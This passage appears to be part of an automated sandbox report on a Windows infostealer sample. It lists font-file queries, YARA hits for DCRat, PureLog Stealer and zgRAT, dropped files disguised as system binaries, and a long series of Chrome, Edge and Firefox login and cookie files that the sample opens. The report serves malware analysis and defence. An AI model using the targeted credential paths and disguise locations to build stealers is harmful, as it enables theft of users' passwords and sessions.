Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_0101DF1E
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0100B146 GetVersionExW, 0_2_0100B146
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected DCRat
Source: Yara match File source: 00000004.00000002.1932393224.0000000013164000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: driverInto.exe PID: 5936, type: MEMORYSTR
Yara detected PureLog Stealer
Source: Yara match File source: 4.0.driverInto.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000000.1783939727.0000000000AC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1622104471.0000000006DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Windows Defender\services.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\portintosvc\driverInto.exe, type: DROPPED
Source: Yara match File source: C:\Windows\Registration\csrss.exe, type: DROPPED
Yara detected zgRAT
Source: Yara match File source: 4.0.driverInto.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\Program Files (x86)\Windows Defender\services.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe, type: DROPPED
Source: Yara match File source: C:\portintosvc\driverInto.exe, type: DROPPED
Source: Yara match File source: C:\Windows\Registration\csrss.exe, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
